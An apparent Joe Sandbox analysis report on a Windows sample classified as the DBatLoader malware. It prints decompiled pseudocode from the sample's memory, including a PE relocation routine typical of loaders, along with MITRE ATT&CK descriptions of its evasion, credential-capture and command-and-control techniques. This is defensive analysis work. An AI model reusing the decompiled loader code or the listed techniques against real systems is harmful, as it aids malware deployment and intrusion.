						__eflags = __edx - _t154;
						if(__edx > _t154) {
							_t73 =  *(_t182 - 4);
							__eflags = _t73 & 0x00000001;
							if((_t73 & 0x00000001) == 0) {
								L51:
								asm("adc edi, 0xffffffff");
								_t198 = ((_t154 >> 0x00000002) + _t154 - _t166 & 0) + _t166;
								_t184 = _t154;
								_t80 = E03261724(((_t154 >> 0x00000002) + _t154 - _t166 & 0) + _t166);
								_t170 = _t166;
								__eflags = _t80;
								if(_t80 == 0) {
									goto L49;
								} else {
									__eflags = _t198 - 0x40a2c;
									if(_t198 > 0x40a2c) {
										 *((intOrPtr*)(_t80 - 8)) = _t170;
									}
									E03261474(_t196, _t184, _t80);
									E03261A8C(_t196, _t184);
									return _t80;
								}
							} else {
								_t86 = _t73 & 0xfffffff0;
								_t202 = _t154 + _t86;
								__eflags = __edx - _t202;
								if(__edx > _t202) {
									goto L51;
								} else {
									__eflags =  *0x329b04d;
									if(__eflags == 0) {
										L42:
										__eflags = _t86 - 0xb30;
										if(_t86 >= 0xb30) {
											E032614C0(_t182);
											_t166 = _t166;
											_t154 = _t154;
										}
										asm("adc edi, 0xffffffff");
										_t94 = (_t166 + ((_t154 >> 0x00000002) + _t154 - _t166 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
										_t173 = _t202 + 4 - _t94;
										__eflags = _t173;
										if(_t173 > 0) {
											 *(_t196 + _t202 - 4) = _t173;
											 *((intOrPtr*)(_t196 - 4 + _t94)) = _t173 + 3;
											_t203 = _t94;
											__eflags = _t173 - 0xb30;
											if(_t173 >= 0xb30) {
												__eflags = _t94 + _t196;
												E03261500(_t94 + _t196, _t154, _t173);
											}
										} else {
											 *(_t196 + _t202) =  *(_t196 + _t202) & 0xfffffff7;
											_t203 = _t202 + 4;
										}
										_t204 = _t203 | _t136;
										__eflags = _t204;
										 *(_t196 - 4) = _t204;
										 *0x329b718 = 0;
										_t80 = _t196;
										L49:
										return _t80;
									} else {
										while(1) {
											asm("lock cmpxchg [0x329b718], ah");
											if(__eflags == 0) {
												break;
											}
											Sleep(0);
											_t166 = _t166;
											_t154 = _t154;
											asm("lock cmpxchg [0x329b718], ah");
											if(__eflags != 0) {
												Sleep(0xa);
												_t166 = _t166;
												_t154 = _t154;
												continue;
											}
											break;
										}
										_t136 = 0x0000000f &  *(_t196 - 4);
										_t100 =  *(_t182 - 4);
										__eflags = _t100 & 0x00000001;
										if((_t100 & 0x00000001) == 0) {
											L50:
											 *0x329b718 = 0;
											goto L51;
										} else {
											_t86 = _t100 & 0xfffffff0;
											_t202 = _t154 + _t86;
											__eflags = _t166 - _t202;
											if(_t166 > _t202) {
												goto L50;
											} else {
												goto L42;
											}
										}
									}
								}
							}
						} else {
							_t205 = __edx + __edx;
							__eflags = _t205 - _t154;
							if(_t205 < _t154) {
								__eflags = __edx - 0xb2c;
								if(__edx >= 0xb2c) {
									L19:
									_t16 = _t166 + 0xd3; // 0xbff
									_t208 = (_t16 & 0xffffff00) + 0x30;
									_t157 = _t154 + 4 - _t208;
									__eflags =  *0x329b04d;
									if(__eflags != 0) {
										while(1) {
											asm("lock cmpxchg [0x329b718], ah");
											if(__eflags == 0) {
												break;
											}
											Sleep(0);
											_t157 = _t157;
											asm("lock cmpxchg [0x329b718], ah");
											if(__eflags != 0) {
												Sleep(0xa);
												_t157 = _t157;
												continue;
											}
											break;
										}
										_t136 = 0x0000000f &  *(_t196 - 4);
										__eflags = 0xf;
									}
									 *(_t196 - 4) = _t136 | _t208;
									_t139 = _t157;
									_t174 =  *(_t182 - 4);
									__eflags = _t174 & 0x00000001;
									if((_t174 & 0x00000001) != 0) {
										_t102 = _t182;
										_t175 = _t174 & 0xfffffff0;
										_t139 = _t139 + _t175;
										_t182 = _t182 + _t175;
										__eflags = _t175 - 0xb30;
										if(_t175 >= 0xb30) {
											E032614C0(_t102);
										}
									} else {
										 *(_t182 - 4) = _t174 | 0x00000008;
									}
									 *((intOrPtr*)(_t182 - 8)) = _t139;
									 *((intOrPtr*)(_t196 + _t208 - 4)) = _t139 + 3;
									__eflags = _t139 - 0xb30;
									if(_t139 >= 0xb30) {
										E03261500(_t196 + _t208, _t157, _t139);
									}
									 *0x329b718 = 0;
									return _t196;
								} else {
									__eflags = _t205 - 0xb2c;
									if(_t205 < 0xb2c) {
										_t190 = __edx;
										_t111 = E03261724(__edx);
										__eflags = _t111;
										if(_t111 != 0) {
											E032614A4(_t196, _t190, _t111);
											E03261A8C(_t196, _t190);
										}
										return _t111;
									} else {
										_t166 = 0xb2c;
										goto L19;
									}
								}
							} else {
								return __eax;
							}
						}
					}
				} else {
					_t141 =  *_t145;
					_t160 = ( *(_t141 + 2) & 0x0000ffff) - 4;
					if(_t160 < __edx) {
						_push(__edi);
						_t193 = __edx;
						asm("adc eax, 0xffffffff");
						_t119 = E03261724((0 & _t160 + _t160 + 0x00000020 - __edx) + __edx);
						__eflags = _t119;
						if(_t119 != 0) {
							__eflags = _t193 - 0x40a2c;
							if(_t193 > 0x40a2c) {
								 *((intOrPtr*)(_t119 - 8)) = _t193;
							}
							__eflags = ( *(_t141 + 2) & 0x0000ffff) - 4;
							_t195 = _t119;
							 *((intOrPtr*)(_t141 + 0x1c))();
							E03261A8C(_t196, _t195);
							_t119 = _t195;
						}
						return _t119;
					} else {
						if(0x40 + __edx * 4 < _t160) {
							_t143 = __edx;
							_t125 = E03261724(__edx);
							__eflags = _t125;
							if(_t125 != 0) {
								E032614A4(_t196, _t143, _t125);
								E03261A8C(_t196, __edi);
								return _t125;
							}
							return _t125;
						} else {
							return __eax;
						}
					}
				}
			}

0x03261c6c
0x03261c6c
0x03261c6c
0x03261c74
0x03261c76
0x03261d04
0x03261d07
0x03261f58
0x03261f5b
0x03261fec
0x03261ff0
0x03261f61
0x03261f61
0x03261f64
0x03261f66
0x03261fae
0x03261fb0
0x03261fb8
0x03261fbc
0x03261fc1
0x03261fc3
0x00000000
0x03261fc5
0x03261fc5
0x03261fcb
0x03261fcd
0x03261fcd
0x03261fd8
0x03261fdf
0x03261fe8
0x03261fe8
0x03261fb2
0x03261fb2
0x03261fb7
0x03261fb7
0x03261f68
0x03261f73
0x03261f7a
0x03261f7c
0x03261f7d
0x03261f82
0x03261f83
0x03261f85
0x03261f87
0x03261f8d
0x03261f8f
0x03261f8f
0x03261f9b
0x03261fa2
0x00000000
0x03261fa7
0x03261fab
0x03261fab
0x03261fab
0x03261f66
0x03261d0d
0x03261d0f
0x03261d12
0x03261d13
0x03261d16
0x03261d19
0x03261d1c
0x03261d1f
0x03261e24
0x03261e27
0x03261e29
0x03261f10
0x03261f1b
0x03261f22
0x03261f24
0x03261f27
0x03261f2c
0x03261f2d
0x03261f2f
0x00000000
0x03261f31
0x03261f31
0x03261f37
0x03261f39
0x03261f39
0x03261f44
0x03261f4b
0x03261f56
0x03261f56
0x03261e2f
0x03261e2f
0x03261e32
0x03261e35
0x03261e37
0x00000000
0x03261e3d
0x03261e3d
0x03261e44
0x03261e95
0x03261e95
0x03261e9a
0x03261ea0
0x03261ea5
0x03261ea6
0x03261ea6
0x03261eb2
0x03261ec3
0x03261ec9
0x03261ec9
0x03261ecb
0x03261ed8
0x03261edf
0x03261ee3
0x03261ee5
0x03261eeb
0x03261eed
0x03261eef
0x03261eef
0x03261ecd
0x03261ecd
0x03261ed1
0x03261ed1
0x03261ef4
0x03261ef4
0x03261ef6
0x03261ef9
0x03261f00
0x03261f02
0x03261f06
0x03261e46
0x03261e46
0x03261e4b
0x03261e53
0x00000000
0x00000000
0x03261e59
0x03261e5e
0x03261e5f
0x03261e65
0x03261e6d
0x03261e73
0x03261e78
0x03261e79
0x00000000
0x03261e79
0x00000000
0x03261e6d
0x03261e81
0x03261e84
0x03261e87
0x03261e89
0x03261f09
0x03261f09
0x00000000
0x03261e8b
0x03261e8b
0x03261e8e
0x03261e91
0x03261e93
0x00000000
0x00000000
0x00000000
0x00000000
0x03261e93
0x03261e89
0x03261e44
0x03261e37
0x03261d25
0x03261d25
0x03261d28
0x03261d2a
0x03261d34
0x03261d3a
0x03261d4d
0x03261d4d
0x03261d59
0x03261d5f
0x03261d61
0x03261d68
0x03261d6a
0x03261d6f
0x03261d77
0x00000000
0x00000000
0x03261d7c
0x03261d81
0x03261d87
0x03261d8f
0x03261d94
0x03261d99
0x00000000
0x03261d99
0x00000000
0x03261d8f
0x03261da1
0x03261da1
0x03261da1
0x03261da6
0x03261da9
0x03261dab
0x03261dae
0x03261db1
0x03261dbc
0x03261dbe
0x03261dc1
0x03261dc3
0x03261dc5
0x03261dcb
0x03261dcd
0x03261dcd
0x03261db3
0x03261db6
0x03261db6
0x03261dd2
0x03261dd8
0x03261ddc
0x03261de2
0x03261de9
0x03261de9
0x03261dee
0x03261dfb
0x03261d3c
0x03261d3c
0x03261d42
0x03261dfc
0x03261e00
0x03261e05
0x03261e07
0x03261e11
0x03261e18
0x03261e18
0x03261e23
0x03261d48
0x03261d48
0x00000000
0x03261d48
0x03261d42
0x03261d2c
0x03261d30
0x03261d30
0x03261d2a
0x03261d1f
0x03261c7c
0x03261c7c
0x03261c82
0x03261c87
0x03261cc4
0x03261cc5
0x03261ccb
0x03261cd2
0x03261cd7
0x03261cd9
0x03261cdb
0x03261ce1
0x03261ce3
0x03261ce3
0x03261cea
0x03261cef
0x03261cf3
0x03261cf8
0x03261cfd
0x03261cfd
0x03261d02
0x03261c89
0x03261c92
0x03261c98
0x03261c9c
0x03261ca1
0x03261ca3
0x03261cad
0x03261cb4
0x00000000
0x03261cb9
0x03261cbd
0x03261c96
0x03261c96
0x03261c96
0x03261c92
0x03261c87

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18dee43a7853429a2897fb33ee297638859d3785755f4ac69cdd4909aa5672b
Instruction ID: 758ea76fc036b0b17b63c35058c32b875be19ca9cca2935d3ae253be36a01601
Opcode Fuzzy Hash: b18dee43a7853429a2897fb33ee297638859d3785755f4ac69cdd4909aa5672b
Instruction Fuzzy Hash: 99A1C5677307014BD719EA7CAD843ADB3859FC4261F1C827EE115CB386EBA4F9E18290

Uniqueness

Uniqueness Score: -1.00%

Function 032694D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79
threadCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E032694D0(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				char _v280;
				intOrPtr _v284;
				char* _t34;
				intOrPtr* _t50;
				intOrPtr _t59;
				void* _t64;
				intOrPtr _t66;
				void* _t70;

				_v8 = 0;
				_t50 = __edx;
				_t64 = __eax;
				_push(_t70);
				_push(0x32695be);
				_push( *[fs:eax]);
				 *[fs:eax] = _t70 + 0xfffffee8;
				E032644A0(__edx);
				_v24 =  *(_a4 - 0xe) & 0x0000ffff;
				_v22 =  *(_a4 - 0x10) & 0x0000ffff;
				_v18 =  *(_a4 - 0x12) & 0x0000ffff;
				if(_t64 > 2) {
					E03264538( &_v8, 0x32695e0);
				} else {
					E03264538( &_v8, 0x32695d4);
				}
				_t34 = E03264964(_v8);
				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t34,  &_v280, 0x100) != 0) {
					E03264710(_t50, 0x100,  &_v280);
					if(_t64 == 1 &&  *((char*)( *_t50)) == 0x30) {
						_v284 =  *_t50;
						_t66 = _v284;
						if(_t66 != 0) {
							_t66 =  *((intOrPtr*)(_t66 - 4));
						}
						E032649C4( *_t50, _t66 - 1, 2, _t50);
					}
				}
				_pop(_t59);
				 *[fs:eax] = _t59;
				_push(E032695C5);
				return E032644A0( &_v8);
			}

0x032694dd
0x032694e0
0x032694e2
0x032694e6
0x032694e7
0x032694ec
0x032694ef
0x032694f4
0x03269500
0x0326950b
0x03269516
0x0326951d
0x03269536
0x0326951f
0x03269527
0x03269527
0x0326954a
0x03269563
0x03269572
0x03269578
0x03269583
0x03269589
0x03269591
0x03269596
0x03269596
0x032695a3
0x032695a3
0x03269578
0x032695aa
0x032695ad
0x032695b0
0x032695bd

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,032695BE), ref: 03269556
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,032695BE), ref: 0326955C

Strings

yyyy, xrefs: 03269531

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: eaae9ac5ac24d7f626ed78fe0217e5ab6f8f2b12da5346bd1322b2dc626ffa68
Instruction ID: dc22059fead599ebf68cd23bbe25064e0c68ca6f43136ea445093921a95de1dc
Opcode Fuzzy Hash: eaae9ac5ac24d7f626ed78fe0217e5ab6f8f2b12da5346bd1322b2dc626ffa68
Instruction Fuzzy Hash: CB21B775A242589FDB11EF69C851AEEB3F8EF49700F4100A5E944EB240DB70DEC4C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 03272A2C Relevance: 5.1, Strings: 4, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E03272A2C(signed int __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				void* _v8;
				char _v264;
				char _v520;
				char _v524;
				void* _t20;
				signed char _t47;
				intOrPtr* _t59;
				intOrPtr _t61;
				intOrPtr* _t75;
				void* _t78;

				_v524 = 0;
				_t75 = __edx;
				_t47 = __eax;
				_push(_t78);
				_push(0x3272b52);
				_push( *[fs:eax]);
				 *[fs:eax] = _t78 + 0xfffffdf8;
				_t73 = __eax & 0x00000fff;
				if((__eax & 0x00000fff) > 0x14) {
					__eflags = __eax - 0x100;
					if(__eax != 0x100) {
						__eflags = __eax - 0x101;
						if(__eax != 0x101) {
							_t20 = E03272E88(__eax,  &_v8);
							__eflags = _t20;
							if(_t20 == 0) {
								E03267A88( &_v524, 4);
								_t59 =  *0x329a958; // 0x3289828
								E032647B0(_t75, _v524,  *_t59);
							} else {
								E0326363C( *_v8,  &_v520);
								E03262D7C( &_v520, 0x7fffffff, 2,  &_v264);
								E03264704(__edx,  &_v264, __eflags);
							}
						} else {
							E032644F4(__edx, 0x3272b78);
						}
					} else {
						E032644F4(__edx, "String");
					}
				} else {
					E032644F4(__edx,  *((intOrPtr*)(0x3289a2c + (_t73 & 0x0000ffff) * 4)));
				}
				if((_t47 & 0x00000020) != 0) {
					E032647B0(_t75,  *_t75, "Array ");
				}
				if((_t47 & 0x00000040) != 0) {
					E032647B0(_t75,  *_t75, "ByRef ");
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(0x3272b59);
				return E032644A0( &_v524);
			}

0x03272a3a
0x03272a40
0x03272a42
0x03272a46
0x03272a47
0x03272a4c
0x03272a4f
0x03272a54
0x03272a5d
0x03272a75
0x03272a7a
0x03272a8d
0x03272a92
0x03272aa7
0x03272aac
0x03272aae
0x03272af9
0x03272b04
0x03272b0e
0x03272ab0
0x03272ac2
0x03272ad7
0x03272ae4
0x03272ae4
0x03272a94
0x03272a9b
0x03272a9b
0x03272a7c
0x03272a83
0x03272a83
0x03272a5f
0x03272a6b
0x03272a6b
0x03272b16
0x03272b21
0x03272b21
0x03272b29
0x03272b34
0x03272b34
0x03272b3b
0x03272b3e
0x03272b41
0x03272b51

Strings

String, xrefs: 03272A7E
Array , xrefs: 03272B1C
ByRef , xrefs: 03272B2F
Any, xrefs: 03272A96

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID:
String ID: Any$Array $ByRef $String
API String ID: 0-2719049652
Opcode ID: 817f449967aa834909fdc378992d26a111a33c07e2b738262d070d09a35fd0e3
Instruction ID: 16bee31b054ea8b52d5fefc545b71e3a03fa1e89554bf05f912e4ff005242f85
Opcode Fuzzy Hash: 817f449967aa834909fdc378992d26a111a33c07e2b738262d070d09a35fd0e3
Instruction Fuzzy Hash: 7A213538730325CFC720FF28C9487A973E9FF89210F544992E5848B380DAB49DC18691

Uniqueness

Uniqueness Score: -1.00%

Function 0327A4D0 Relevance: 5.1, APIs: 4, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0327A4D0(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, intOrPtr _a20) {
				unsigned int _v8;
				void* _v16;
				intOrPtr _v20;
				int _t22;
				void* _t36;
				void* _t43;
				void* _t45;
				void* _t46;

				_t43 = _a12;
				_v20 = _a16 - _a4;
				_t36 = _a12 + 8;
				while(1) {
					_t22 = IsBadReadPtr(_t43, 8);
					if(_t22 != 0) {
						break;
					}
					_t22 = IsBadReadPtr(_t36, 4);
					if(_t22 != 0) {
						break;
					}
					_t22 = _a12 + _a20;
					if(_t22 > _t43) {
						_v8 =  *((intOrPtr*)(_t43 + 4)) - 8 >> 1;
						_t45 = _v8 - 1;
						if(_t45 < 0) {
							L8:
							_t43 = _t36;
							_t36 = _t36 + 8;
							continue;
						}
						_t46 = _t45 + 1;
						do {
							if(IsBadReadPtr(_t36, 4) == 0 && ( *_t36 & 0x0000ffff ^ 0x00003000) < 0x1000) {
								_v16 = ( *_t36 & 0x0000ffff) % 0x3000 +  *_t43 + _a8;
								if(IsBadWritePtr(_v16, 4) == 0) {
									 *_v16 =  *_v16 + _v20;
								}
							}
							_t36 = _t36 + 2;
							_t46 = _t46 - 1;
						} while (_t46 != 0);
						goto L8;
					}
					break;
				}
				return _t22;
			}

0x0327a4d9
0x0327a4e2
0x0327a4e8
0x0327a550
0x0327a553
0x0327a55a
0x00000000
0x00000000
0x0327a55f
0x0327a566
0x00000000
0x00000000
0x0327a56b
0x0327a570
0x0327a4f5
0x0327a4fb
0x0327a4fe
0x0327a54b
0x0327a54b
0x0327a54d
0x00000000
0x0327a54d
0x0327a500
0x0327a501
0x0327a50b
0x0327a52b
0x0327a53b
0x0327a543
0x0327a543
0x0327a53b
0x0327a545
0x0327a548
0x0327a548
0x00000000
0x0327a501
0x00000000
0x0327a570
0x0327a57c

APIs

IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 0327A504
IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 0327A534
IsBadReadPtr.KERNEL32(?,00000008), ref: 0327A553
IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 0327A55F

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: Read$Write
String ID:
API String ID: 3448952669-0
Opcode ID: 6129f2bbfa62dbd872cdb4acd30af957bfb5020b3cc7e497b347e76894bc1354
Instruction ID: 63208cfbc68561894e9b21b3c6d67b01f1193fb162b6beb44f9ebb4cd7fca9f1
Opcode Fuzzy Hash: 6129f2bbfa62dbd872cdb4acd30af957bfb5020b3cc7e497b347e76894bc1354
Instruction Fuzzy Hash: 0921B771A5031A9BDF20CF58CC80B9E7778FF803A1F048555ED14A7340E774E9918790

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report r096teIe1H.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DBatLoader

Yara Signatures

Initial Sample

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Statistics

